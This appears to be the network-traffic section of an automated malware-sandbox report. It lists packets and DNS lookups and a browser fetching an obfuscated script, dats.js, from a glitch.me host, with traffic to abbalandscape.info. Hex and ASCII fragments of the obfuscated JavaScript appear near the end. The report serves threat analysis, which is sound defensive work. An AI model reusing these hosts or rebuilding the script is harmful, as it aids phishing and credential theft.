Jul 3, 2024 21:20:22.391838074 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:22.391845942 CEST	443	49767	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:22.392899036 CEST	443	49767	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:22.392961025 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:22.394054890 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:22.394118071 CEST	443	49767	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:22.394222021 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:22.440498114 CEST	443	49767	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:22.442426920 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:22.442433119 CEST	443	49767	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:22.489339113 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:23.913866997 CEST	443	49767	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:23.914381027 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:23.914520025 CEST	443	49767	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:23.914577961 CEST	49767	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:23.962263107 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:23.962284088 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:23.962352991 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:23.962724924 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:23.962739944 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:24.688329935 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:24.688674927 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:24.688703060 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:24.689817905 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:24.689892054 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:24.690299034 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:24.690385103 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:24.690489054 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:24.690507889 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:24.739142895 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:25.063503981 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:25.063570976 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:25.063726902 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:25.064424992 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:25.064465046 CEST	443	49768	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:25.064477921 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:25.064512014 CEST	49768	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:31.658334017 CEST	80	49724	217.20.57.24	192.168.2.4
Jul 3, 2024 21:20:31.658451080 CEST	49724	80	192.168.2.4	217.20.57.24
Jul 3, 2024 21:20:31.658679962 CEST	49724	80	192.168.2.4	217.20.57.24
Jul 3, 2024 21:20:31.663871050 CEST	80	49724	217.20.57.24	192.168.2.4
Jul 3, 2024 21:20:38.841557026 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:38.841592073 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:38.841697931 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:38.843940020 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:38.843980074 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:39.556401014 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:39.556754112 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:39.556787014 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:39.557833910 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:39.557894945 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:39.558248997 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:39.558314085 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:39.558414936 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:39.558429003 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:39.598982096 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.100215912 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:41.100292921 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:41.100569963 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.100752115 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.100769997 CEST	443	49769	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:41.100779057 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.100833893 CEST	49769	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.118954897 CEST	49770	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.118984938 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:41.119054079 CEST	49770	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.119275093 CEST	49770	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.119287014 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:41.819143057 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:41.819513083 CEST	49770	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.819534063 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:41.819838047 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:41.820166111 CEST	49770	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.820219040 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:41.820328951 CEST	49770	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:41.860502005 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:42.189002037 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:42.189059973 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:42.189121008 CEST	49770	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:42.189575911 CEST	49770	443	192.168.2.4	185.244.151.84
Jul 3, 2024 21:20:42.189587116 CEST	443	49770	185.244.151.84	192.168.2.4
Jul 3, 2024 21:20:51.007817030 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.007853031 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.008002043 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.008590937 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.008601904 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.685825109 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.685900927 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.690428972 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.690437078 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.690663099 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.700025082 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.740504980 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.942049026 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.942068100 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.942101002 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.942171097 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.942183018 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.942239046 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.942239046 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.949429035 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.949471951 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.949508905 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.949516058 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.949527025 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.949558020 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.949580908 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.949636936 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.949649096 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:20:51.949681997 CEST	49771	443	192.168.2.4	52.165.165.26
Jul 3, 2024 21:20:51.949687004 CEST	443	49771	52.165.165.26	192.168.2.4
Jul 3, 2024 21:21:02.642755985 CEST	49773	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:21:02.642796993 CEST	443	49773	216.58.206.68	192.168.2.4
Jul 3, 2024 21:21:02.642867088 CEST	49773	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:21:02.643296957 CEST	49773	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:21:02.643310070 CEST	443	49773	216.58.206.68	192.168.2.4
Jul 3, 2024 21:21:03.288793087 CEST	443	49773	216.58.206.68	192.168.2.4
Jul 3, 2024 21:21:03.289446115 CEST	49773	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:21:03.289460897 CEST	443	49773	216.58.206.68	192.168.2.4
Jul 3, 2024 21:21:03.289742947 CEST	443	49773	216.58.206.68	192.168.2.4
Jul 3, 2024 21:21:03.290138006 CEST	49773	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:21:03.290240049 CEST	443	49773	216.58.206.68	192.168.2.4
Jul 3, 2024 21:21:03.334003925 CEST	49773	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:21:13.193619967 CEST	443	49773	216.58.206.68	192.168.2.4
Jul 3, 2024 21:21:13.193687916 CEST	443	49773	216.58.206.68	192.168.2.4
Jul 3, 2024 21:21:13.193783998 CEST	49773	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:21:13.994596958 CEST	49773	443	192.168.2.4	216.58.206.68
Jul 3, 2024 21:21:13.994616032 CEST	443	49773	216.58.206.68	192.168.2.4
Jul 3, 2024 21:21:31.952423096 CEST	54379	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:21:31.957262993 CEST	53	54379	1.1.1.1	192.168.2.4
Jul 3, 2024 21:21:31.957395077 CEST	54379	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:21:31.957396030 CEST	54379	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:21:31.962285995 CEST	53	54379	1.1.1.1	192.168.2.4
Jul 3, 2024 21:21:32.420687914 CEST	53	54379	1.1.1.1	192.168.2.4
Jul 3, 2024 21:21:32.421879053 CEST	54379	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:21:32.427021980 CEST	53	54379	1.1.1.1	192.168.2.4
Jul 3, 2024 21:21:32.427093029 CEST	54379	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:22:02.702152967 CEST	54381	443	192.168.2.4	142.250.185.164
Jul 3, 2024 21:22:02.702208042 CEST	443	54381	142.250.185.164	192.168.2.4
Jul 3, 2024 21:22:02.702277899 CEST	54381	443	192.168.2.4	142.250.185.164
Jul 3, 2024 21:22:02.702496052 CEST	54381	443	192.168.2.4	142.250.185.164
Jul 3, 2024 21:22:02.702508926 CEST	443	54381	142.250.185.164	192.168.2.4
Jul 3, 2024 21:22:03.350078106 CEST	443	54381	142.250.185.164	192.168.2.4
Jul 3, 2024 21:22:03.350429058 CEST	54381	443	192.168.2.4	142.250.185.164
Jul 3, 2024 21:22:03.350466013 CEST	443	54381	142.250.185.164	192.168.2.4
Jul 3, 2024 21:22:03.350811958 CEST	443	54381	142.250.185.164	192.168.2.4
Jul 3, 2024 21:22:03.351183891 CEST	54381	443	192.168.2.4	142.250.185.164
Jul 3, 2024 21:22:03.351259947 CEST	443	54381	142.250.185.164	192.168.2.4
Jul 3, 2024 21:22:03.396464109 CEST	54381	443	192.168.2.4	142.250.185.164
Jul 3, 2024 21:22:13.253757000 CEST	443	54381	142.250.185.164	192.168.2.4
Jul 3, 2024 21:22:13.253843069 CEST	443	54381	142.250.185.164	192.168.2.4
Jul 3, 2024 21:22:13.253895044 CEST	54381	443	192.168.2.4	142.250.185.164
Jul 3, 2024 21:22:14.007421970 CEST	54381	443	192.168.2.4	142.250.185.164
Jul 3, 2024 21:22:14.007479906 CEST	443	54381	142.250.185.164	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 21:19:59.615567923 CEST	53	54176	1.1.1.1	192.168.2.4
Jul 3, 2024 21:19:59.626513004 CEST	53	59607	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:00.151535034 CEST	61834	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:00.152029991 CEST	64806	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:00.166701078 CEST	53	64806	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:00.176604033 CEST	53	61834	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:00.745662928 CEST	53	51247	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:02.238188028 CEST	49608	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:02.238630056 CEST	61515	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:02.246197939 CEST	53	61515	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:02.246304989 CEST	53	49608	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:02.699086905 CEST	54289	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:02.699362993 CEST	61031	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:02.701359034 CEST	59128	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:02.701562881 CEST	57941	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:02.706722975 CEST	53	61031	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:02.707004070 CEST	53	54289	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:02.709548950 CEST	53	57941	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:02.710961103 CEST	53	59128	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:15.656162024 CEST	53	53203	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:17.351438046 CEST	138	138	192.168.2.4	192.168.2.255
Jul 3, 2024 21:20:18.284389973 CEST	53	50657	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:21.653856039 CEST	65167	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:21.654072046 CEST	63513	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:21.679621935 CEST	53	65167	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:21.682583094 CEST	53	63513	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:23.934094906 CEST	55578	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:23.934495926 CEST	63452	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:20:23.952414989 CEST	53	55578	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:23.965601921 CEST	53	63452	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:37.312315941 CEST	53	56792	1.1.1.1	192.168.2.4
Jul 3, 2024 21:20:59.158284903 CEST	53	63630	1.1.1.1	192.168.2.4
Jul 3, 2024 21:21:00.327500105 CEST	53	62128	1.1.1.1	192.168.2.4
Jul 3, 2024 21:21:26.905637026 CEST	53	53519	1.1.1.1	192.168.2.4
Jul 3, 2024 21:21:31.951770067 CEST	53	61265	1.1.1.1	192.168.2.4
Jul 3, 2024 21:22:02.694143057 CEST	54416	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:22:02.694298983 CEST	60580	53	192.168.2.4	1.1.1.1
Jul 3, 2024 21:22:02.701240063 CEST	53	54416	1.1.1.1	192.168.2.4
Jul 3, 2024 21:22:02.701255083 CEST	53	60580	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jul 3, 2024 21:20:23.965749025 CEST	192.168.2.4	1.1.1.1	c227	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 21:20:00.151535034 CEST	192.168.2.4	1.1.1.1	0xd039	Standard query (0)	rounded-screeching-script.glitch.me	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:00.152029991 CEST	192.168.2.4	1.1.1.1	0x8f16	Standard query (0)	rounded-screeching-script.glitch.me	65	IN (0x0001)	false
Jul 3, 2024 21:20:02.238188028 CEST	192.168.2.4	1.1.1.1	0xcb5b	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.238630056 CEST	192.168.2.4	1.1.1.1	0xed8a	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Jul 3, 2024 21:20:02.699086905 CEST	192.168.2.4	1.1.1.1	0xa1a0	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.699362993 CEST	192.168.2.4	1.1.1.1	0x1062	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jul 3, 2024 21:20:02.701359034 CEST	192.168.2.4	1.1.1.1	0x2ba	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.701562881 CEST	192.168.2.4	1.1.1.1	0xada1	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Jul 3, 2024 21:20:21.653856039 CEST	192.168.2.4	1.1.1.1	0xd098	Standard query (0)	abbalandscape.info	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:21.654072046 CEST	192.168.2.4	1.1.1.1	0x54a4	Standard query (0)	abbalandscape.info	65	IN (0x0001)	false
Jul 3, 2024 21:20:23.934094906 CEST	192.168.2.4	1.1.1.1	0x7226	Standard query (0)	abbalandscape.info	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:23.934495926 CEST	192.168.2.4	1.1.1.1	0xe27a	Standard query (0)	abbalandscape.info	65	IN (0x0001)	false
Jul 3, 2024 21:22:02.694143057 CEST	192.168.2.4	1.1.1.1	0xf720	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:22:02.694298983 CEST	192.168.2.4	1.1.1.1	0x2bc6	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 21:20:00.176604033 CEST	1.1.1.1	192.168.2.4	0xd039	No error (0)	rounded-screeching-script.glitch.me		44.197.227.46	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:00.176604033 CEST	1.1.1.1	192.168.2.4	0xd039	No error (0)	rounded-screeching-script.glitch.me		3.209.36.135	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.246197939 CEST	1.1.1.1	192.168.2.4	0xed8a	No error (0)	cdnjs.cloudflare.com			65	IN (0x0001)	false
Jul 3, 2024 21:20:02.246304989 CEST	1.1.1.1	192.168.2.4	0xcb5b	No error (0)	cdnjs.cloudflare.com		104.17.24.14	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.246304989 CEST	1.1.1.1	192.168.2.4	0xcb5b	No error (0)	cdnjs.cloudflare.com		104.17.25.14	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.706722975 CEST	1.1.1.1	192.168.2.4	0x1062	No error (0)	www.google.com			65	IN (0x0001)	false
Jul 3, 2024 21:20:02.707004070 CEST	1.1.1.1	192.168.2.4	0xa1a0	No error (0)	www.google.com		216.58.206.68	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.708822966 CEST	1.1.1.1	192.168.2.4	0xe27	No error (0)	shed.dual-low.s-part-0032.t-0009.t-msedge.net	s-part-0032.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 3, 2024 21:20:02.708822966 CEST	1.1.1.1	192.168.2.4	0xe27	No error (0)	s-part-0032.t-0009.t-msedge.net		13.107.246.60	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.710961103 CEST	1.1.1.1	192.168.2.4	0x2ba	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.710961103 CEST	1.1.1.1	192.168.2.4	0x2ba	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.710961103 CEST	1.1.1.1	192.168.2.4	0x2ba	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:02.710961103 CEST	1.1.1.1	192.168.2.4	0x2ba	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:05.655821085 CEST	1.1.1.1	192.168.2.4	0x1df7	No error (0)	shed.dual-low.s-part-0016.t-0009.t-msedge.net	s-part-0016.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 3, 2024 21:20:05.655821085 CEST	1.1.1.1	192.168.2.4	0x1df7	No error (0)	s-part-0016.t-0009.t-msedge.net		13.107.246.44	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:21.679621935 CEST	1.1.1.1	192.168.2.4	0xd098	No error (0)	abbalandscape.info		185.244.151.84	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:20:23.952414989 CEST	1.1.1.1	192.168.2.4	0x7226	No error (0)	abbalandscape.info		185.244.151.84	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:22:02.701240063 CEST	1.1.1.1	192.168.2.4	0xf720	No error (0)	www.google.com		142.250.185.164	A (IP address)	IN (0x0001)	false
Jul 3, 2024 21:22:02.701255083 CEST	1.1.1.1	192.168.2.4	0x2bc6	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

rounded-screeching-script.glitch.me

cdnjs.cloudflare.com

code.jquery.com

aadcdn.msauth.net

fs.microsoft.com

slscr.update.microsoft.com

abbalandscape.info

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	44.197.227.46	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:00 UTC	594	OUT	GET /dats.js HTTP/1.1 Host: rounded-screeching-script.glitch.me Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:01 UTC	522	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 19:20:01 GMT Content-Type: application/javascript; charset=utf-8 Content-Length: 1051640 Connection: close x-amz-id-2: 47jZdwaJbIA5h/QyHCK7xByBQexEnR8Pw+wP+QEdA5n2gzcd9XMo3iGE3GvmdqR+q1fKI9PdEoE= x-amz-request-id: DACMK83GK0ATFMSF last-modified: Sun, 30 Jun 2024 18:08:48 GMT etag: "73db972c193b8afcb4d3f9ae9aa1433a" x-amz-server-side-encryption: AES256 cache-control: no-cache x-amz-version-id: yoP6Ow5Nft7_AcnkFniKHP1a30VYl6xE accept-ranges: bytes server: AmazonS3
2024-07-03 19:20:01 UTC	15772	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 31 63 38 35 35 2c 5f 30 78 31 33 35 35 32 61 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 38 64 35 64 32 28 5f 30 78 35 33 66 36 39 32 2c 5f 30 78 33 31 35 30 34 39 2c 5f 30 78 35 30 38 31 62 36 2c 5f 30 78 35 63 36 34 38 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 65 31 64 39 28 5f 30 78 35 33 66 36 39 32 2d 20 2d 30 78 32 34 30 2c 5f 30 78 35 30 38 31 62 36 29 3b 7d 76 61 72 20 5f 30 78 36 37 38 64 31 64 3d 5f 30 78 35 31 63 38 35 35 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 36 34 32 66 32 65 28 5f 30 78 33 30 38 61 64 63 2c 5f 30 78 33 33 35 65 30 36 2c 5f 30 78 32 30 64 30 30 66 2c 5f 30 78 32 65 65 30 30 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 65 31 64 39 28 5f 30 78 33 33 35 65 30 36 2d 30 78 32 64 66 2c 5f 30 Data Ascii: (function(_0x51c855,_0x13552a){function _0x18d5d2(_0x53f692,_0x315049,_0x5081b6,_0x5c6487){return _0xe1d9(_0x53f692- -0x240,_0x5081b6);}var _0x678d1d=_0x51c855();function _0x642f2e(_0x308adc,_0x335e06,_0x20d00f,_0x2ee006){return _0xe1d9(_0x335e06-0x2df,_0
2024-07-03 19:20:01 UTC	8949	IN	Data Raw: 78 31 31 32 39 61 34 28 30 78 31 30 61 34 2c 30 78 39 63 64 2c 30 78 31 37 31 37 2c 30 78 31 30 32 63 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 39 33 63 2c 30 78 32 31 66 64 2c 30 78 31 33 32 35 2c 30 78 31 65 64 39 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 33 31 64 2c 30 78 63 63 38 2c 30 78 31 33 32 35 2c 30 78 32 35 38 30 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 65 32 66 2c 30 78 31 31 34 63 2c 30 78 31 62 36 64 2c 30 78 31 36 30 39 29 2b 27 49 69 49 69 49 69 49 69 49 69 27 2b 5f 30 78 32 30 62 65 36 66 28 30 78 63 35 61 2c 30 78 32 32 62 61 2c 30 78 31 61 62 38 2c 30 78 31 34 65 39 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 31 30 32 62 2c 30 78 31 39 36 65 2c 30 78 31 65 61 61 2c 30 78 31 38 38 33 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 32 30 35 39 Data Ascii: x1129a4(0x10a4,0x9cd,0x1717,0x102c)+_0x20be6f(0x93c,0x21fd,0x1325,0x1ed9)+_0x20be6f(0x31d,0xcc8,0x1325,0x2580)+_0x20be6f(0xe2f,0x114c,0x1b6d,0x1609)+'IiIiIiIiIi'+_0x20be6f(0xc5a,0x22ba,0x1ab8,0x14e9)+_0x1129a4(0x102b,0x196e,0x1eaa,0x1883)+_0x20be6f(0x2059
2024-07-03 19:20:01 UTC	16384	IN	Data Raw: 37 31 37 2c 30 78 31 34 35 35 29 2b 27 4d 7a 4d 7a 4d 7a 4d 7a 4d 79 27 2b 5f 30 78 32 30 62 65 36 66 28 30 78 32 61 61 35 2c 30 78 32 38 32 39 2c 30 78 31 61 62 38 2c 30 78 32 32 33 62 29 2b 27 49 69 49 69 49 69 49 69 49 69 27 2b 5f 30 78 31 31 32 39 61 34 28 30 78 63 36 64 2c 30 78 33 31 39 30 2c 30 78 31 65 61 61 2c 30 78 31 35 62 33 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 32 38 66 35 2c 30 78 31 64 33 30 2c 30 78 31 61 62 38 2c 30 78 32 30 33 32 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 31 30 39 34 2c 30 78 31 65 65 33 2c 30 78 31 62 66 38 2c 30 78 31 33 31 39 29 2b 5f 30 78 31 31 32 39 61 34 28 30 78 32 34 39 35 2c 30 78 32 39 34 36 2c 30 78 31 37 31 37 2c 30 78 31 35 39 39 29 2b 5f 30 78 32 30 62 65 36 66 28 30 78 32 30 32 31 2c 30 78 31 36 34 35 Data Ascii: 